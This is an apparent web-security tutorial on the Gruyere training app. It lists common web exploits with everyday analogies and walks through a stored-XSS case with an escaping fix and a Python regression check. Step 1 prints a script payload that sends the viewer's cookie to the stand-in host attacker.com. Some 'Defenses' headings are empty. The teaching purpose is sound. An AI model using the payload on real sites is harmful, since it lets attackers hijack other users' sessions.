Gruyere: Learn Web Application Exploits and Defenses
Target Layer: Authorization logic
Exploit: User can view or edit another user’s data by changing an ID in the URL or API parameter (IDOR – Insecure Direct Object References).
Defenses:
| Exploit | Description | Real-World Analogy |
|---------|-------------|---------------------|
| XSS (Cross-Site Scripting) | Injecting malicious scripts into trusted websites | A sticky note left on a cash register that tricks the next cashier |
| SQL Injection | Manipulating database queries via unsanitized input | Calling a hotel front desk and pretending to be the manager to get a master key |
| CSRF (Cross-Site Request Forgery) | Tricking authenticated users into unwanted actions | A signed check you didn’t write but your bank accepts |
| Command Injection | Running OS commands through a vulnerable app | Yelling “open sesame” and the door obeys without checking |
| Path Traversal | Reading arbitrary files on the server | Using ../../ to climb out of the guest folder into the vault |
| IDOR (Insecure Direct Object Reference) | Accessing unauthorized data by changing an ID | Changing ?invoice=123 to ?invoice=124 to see someone else’s bill |
| SSRF (Server-Side Request Forgery) | Making the server attack internal systems | Tricking a receptionist into calling a locked room for you |
Let’s look at a specific interaction to solidify the concept.
Target: Gruyere’s "Profile settings" – the age field.
Step 1: Exploit
Input: 35<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
The app saves this to the datastore.
Step 2: Consequence
Every time an admin views your profile, their admin session cookie is sent to the attacker’s server. The attacker then uses that cookie to reload the page as the admin.
Step 3: The Fix (Code Level)
Replace:
self.response.write("<div>Age: %s</div>" % user.age)
With:
self.response.write("<div>Age: %s</div>" % cgi.escape(user.age))
Step 4: The Verification
Attempt the exploit again. Instead of running JavaScript, you literally see the text 35<script>fetch... displayed harmlessly on the page.
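Steps 3 and 4 can be turned into a regression check. The following is an added example, not Gruyere's own code: it assumes Python 3, where `html.escape` stands in for `cgi.escape` (removed in Python 3.8), and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the payload from Step 1 (attacker.com is the page's placeholder host).
PAYLOAD = "35<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"


def render_age_unsafe(age):
    """The 'before' code from Step 3: user data interpolated as raw HTML."""
    return "<div>Age: %s</div>" % age


def render_age_safe(age):
    """The 'after' code. Unlike cgi.escape's default, html.escape also escapes
    quotes, which matters if the value is ever moved into an HTML attribute."""
    return "<div>Age: %s</div>" % html.escape(str(age))


class _Inspector(HTMLParser):
    """Records the start tags an HTML parser creates and the visible text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)


def inspect(markup):
    """Return (list of start tags, concatenated text) for a rendered fragment."""
    parser = _Inspector()
    parser.feed(markup)
    parser.close()
    return parser.tags, "".join(parser.text)


def is_rendered_inert(render, value):
    """Step 4 as a check: only the template's own <div> exists and the
    user's value appears verbatim as text."""
    tags, text = inspect(render(value))
    return tags == ["div"] and text == "Age: " + value
```

Parsing the output, rather than searching it for `<script`, also catches payloads that use other tags, because any element beyond the template's `<div>` fails the check.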
Target Layer: Backend network
Exploit: Attacker makes the server fetch an internal resource (metadata endpoint, localhost services).
Defenses: